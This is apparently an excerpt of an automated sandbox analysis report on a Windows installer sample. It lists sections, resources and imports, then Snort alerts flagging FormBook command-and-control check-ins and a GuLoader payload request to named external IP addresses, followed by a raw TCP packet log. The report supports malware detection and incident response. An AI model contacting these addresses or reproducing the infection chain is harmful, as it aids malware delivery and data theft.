.rdata	0x7000	0x123e	0x1400	False	0.4275390625	data	4.989734782278587	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x9000	0x1a818	0x400	False	0.638671875	data	5.130817636118804	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x24000	0x16000	0x0	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x3a000	0x21d08	0x21e00	False	0.9174858740774908	data	7.758972914922993	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x3a418	0x11d3c	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.9978499041358532
RT_ICON	0x4c158	0x6782	PNG image data, 256 x 256, 8-bit colormap, non-interlaced	English	United States	0.9879990942712658
RT_ICON	0x528e0	0x28b6	PNG image data, 256 x 256, 4-bit colormap, non-interlaced	English	United States	0.9959700633275763
RT_ICON	0x55198	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.6062240663900414
RT_ICON	0x57740	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.6512664165103189
RT_ICON	0x587e8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304	English	United States	0.6993603411513859
RT_ICON	0x59690	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024	English	United States	0.7928700361010831
RT_ICON	0x59f38	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 1152	English	United States	0.526219512195122
RT_ICON	0x5a5a0	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256	English	United States	0.7247109826589595
RT_ICON	0x5ab08	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.7287234042553191
RT_ICON	0x5af70	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 512	English	United States	0.6693548387096774
RT_ICON	0x5b258	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128	English	United States	0.7128378378378378
RT_DIALOG	0x5b380	0x100	data	English	United States	0.5234375
RT_DIALOG	0x5b480	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x5b5a0	0xc4	data	English	United States	0.5918367346938775
RT_DIALOG	0x5b668	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x5b6c8	0xae	data	English	United States	0.6264367816091954
RT_VERSION	0x5b778	0x24c	data	English	United States	0.4812925170068027
RT_MANIFEST	0x5b9c8	0x33e	XML 1.0 document, ASCII text, with very long lines (830), with no line terminators	English	United States	0.5542168674698795

Imports

DLL	Import
KERNEL32.dll	GetTempPathA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetEnvironmentVariableA, Sleep, GetTickCount, GetCommandLineA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GetWindowsDirectoryA, SetFileAttributesA, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, GetExitCodeProcess, WaitForSingleObject, CompareFileTime, SetFileTime, GetFileAttributesA, SetCurrentDirectoryA, MoveFileA, GetFullPathNameA, GetShortPathNameA, SearchPathA, CloseHandle, lstrcmpiA, CreateThread, GlobalLock, lstrcmpA, DeleteFileA, FindFirstFileA, FindNextFileA, FindClose, SetFilePointer, GetPrivateProfileStringA, WritePrivateProfileStringA, MulDiv, MultiByteToWideChar, FreeLibrary, LoadLibraryExA, GetModuleHandleA, GlobalAlloc, GlobalFree, ExpandEnvironmentStringsA
USER32.dll	GetSystemMenu, SetClassLongA, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, LoadImageA, CreateDialogParamA, SetTimer, SetWindowTextA, SetForegroundWindow, ShowWindow, SetWindowLongA, SendMessageTimeoutA, FindWindowExA, IsWindow, AppendMenuA, TrackPopupMenu, CreatePopupMenu, DrawTextA, EndPaint, DestroyWindow, wsprintfA, PostQuitMessage
GDI32.dll	SelectObject, SetTextColor, SetBkMode, CreateFontIndirectA, CreateBrushIndirect, DeleteObject, GetDeviceCaps, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, ShellExecuteExA, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA
ADVAPI32.dll	AdjustTokenPrivileges, RegCreateKeyExA, RegOpenKeyExA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, RegEnumValueA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
COMCTL32.dll	ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll	OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.11.20185.104.28.23850022802031412 10/11/23-23:00:16.443832	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	50022	80	192.168.11.20	185.104.28.238
192.168.11.20104.247.82.9450027802031412 10/11/23-23:02:19.557969	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	50027	80	192.168.11.20	104.247.82.94
192.168.11.20154.12.93.850020802031412 10/11/23-22:59:35.376043	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	50020	80	192.168.11.20	154.12.93.8
192.168.11.2052.20.84.6250028802031412 10/11/23-23:02:39.898715	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	50028	80	192.168.11.20	52.20.84.62
192.168.11.20154.197.227.14250021802031412 10/11/23-22:59:57.794442	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	50021	80	192.168.11.20	154.197.227.142
192.168.11.2091.195.240.12350015802031412 10/11/23-22:56:51.023724	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	50015	80	192.168.11.20	91.195.240.123
192.168.11.2034.120.249.18150018802031412 10/11/23-22:58:13.359547	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	50018	80	192.168.11.20	34.120.249.181
192.168.11.20130.185.109.7750019802031412 10/11/23-22:59:14.631131	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	50019	80	192.168.11.20	130.185.109.77
192.168.11.2018.119.154.6650025802031412 10/11/23-23:01:17.694616	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	50025	80	192.168.11.20	18.119.154.66
192.168.11.2034.120.249.18150026802031412 10/11/23-23:02:00.232802	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	50026	80	192.168.11.20	34.120.249.181
192.168.11.2038.242.133.6150030802031412 10/11/23-23:03:44.695205	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	50030	80	192.168.11.20	38.242.133.61
192.168.11.20103.72.68.12850012802855192 10/11/23-22:55:50.644822	TCP	2855192	ETPRO TROJAN GuLoader Encoded Binary Request M2	50012	80	192.168.11.20	103.72.68.128
192.168.11.20104.18.233.4250016802031412 10/11/23-22:57:11.130716	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	50016	80	192.168.11.20	104.18.233.42
192.168.11.2015.197.142.17350023802031412 10/11/23-23:00:36.461050	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	50023	80	192.168.11.20	15.197.142.173
192.168.11.20208.91.197.3950024802031412 10/11/23-23:00:57.133284	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	50024	80	192.168.11.20	208.91.197.39
192.168.11.203.64.163.5050017802031412 10/11/23-22:57:51.976587	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	50017	80	192.168.11.20	3.64.163.50
192.168.11.201.1.1.153908532023883 10/11/23-22:58:12.039557	UDP	2023883	ET DNS Query to a *.top domain - Likely Hostile	53908	53	192.168.11.20	1.1.1.1

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 11, 2023 22:55:50.280376911 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:50.643551111 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:50.643769026 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:50.644821882 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:51.007841110 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:51.007936001 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:51.007992029 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:51.008085966 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:51.008117914 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:51.008327007 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:51.008327007 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:51.369992018 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:51.370032072 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:51.370362043 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:51.370531082 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:51.370573997 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:51.370606899 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:51.370654106 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:51.370749950 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:51.370799065 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:51.370932102 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:51.370975018 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:51.371182919 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:51.371270895 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:51.371505022 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:51.732408047 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:51.732481956 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:51.732542038 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:51.732597113 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:51.732666969 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:51.732677937 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:51.732714891 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:51.732779026 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:51.732790947 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:51.732865095 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:51.732882023 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:51.732949018 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:51.733009100 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:51.733026028 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:51.733076096 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:51.733093977 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:51.733155012 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:51.733179092 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:51.733254910 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:51.733309031 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:51.733349085 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:51.733377934 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:51.733426094 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:51.733464956 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:51.733504057 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:51.733551025 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:51.733664989 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:51.733705997 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.095550060 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.095627069 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.095690012 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.095745087 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.095805883 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.095808029 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.095897913 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.095911026 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.095958948 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.095989943 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.096067905 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.096129894 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.096196890 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.096237898 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.096293926 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.096295118 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.096374989 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.096379995 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.096457958 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.096518993 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.096558094 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.096587896 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.096610069 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.096677065 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.096700907 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.096760988 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.096781015 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.096847057 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.096884012 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.096934080 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.097027063 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.097047091 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.097126007 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.097187042 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.097208977 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.097270966 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.097290993 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.097359896 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.097378969 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.097445965 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.097534895 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.097579956 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.097596884 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.097664118 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.097681046 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.097807884 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.097872019 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.097898006 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.097975969 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.098014116 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.098057985 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.098123074 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.098171949 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.098226070 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.098284960 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.098301888 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.098371029 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.098433971 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.098483086 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.098551989 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.098656893 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.458867073 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.458945990 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.459007978 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.459058046 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.459079981 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.459125996 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.459176064 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.459177971 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.459254980 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.459309101 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.459322929 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.459357023 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.459414005 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.459438086 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.459501028 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.459527969 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.459604979 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.459616899 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.459680080 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.459772110 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.459821939 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.459888935 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.460011959 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.460144997 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.460216999 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.460316896 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.460400105 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.460410118 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.460459948 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.460496902 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.460566998 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.460625887 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.460655928 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.460705042 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.460732937 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.460812092 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.460870028 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.460968971 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.460999966 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.461025000 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.461090088 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.461153030 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.461153030 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.461230040 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.461309910 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.461361885 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.461385012 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.461447954 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.461513996 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.461513996 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.461591005 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.461630106 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.461668015 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.461699963 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.461760998 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.461779118 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.461849928 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.461850882 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.461956024 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.461999893 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.462006092 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.462083101 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.462146997 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.462151051 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.462227106 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.462300062 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.462353945 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.462373018 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.462423086 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.462460041 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.462527990 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.462606907 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.462666988 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.462696075 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.462810993 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.462814093 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.462891102 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.462953091 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.462981939 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.463032961 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.463047981 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.463113070 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.463143110 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.463198900 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.463244915 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.463270903 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.463294029 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.463356972 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.463376999 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.463452101 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.463458061 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.463474989 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.463505983 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.463561058 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.463613033 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.463660002 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.463768959 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.463784933 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.463886976 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.463922977 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.463964939 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.464040041 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.464055061 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.464139938 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.464210987 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.464293003 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.464318991 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.464335918 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.464535952 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.464690924 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.464848995 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.465456009 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.465590000 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.465603113 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.465701103 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.465718031 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.465799093 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.465823889 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.465909004 CEST	50012	80	192.168.11.20	103.72.68.128
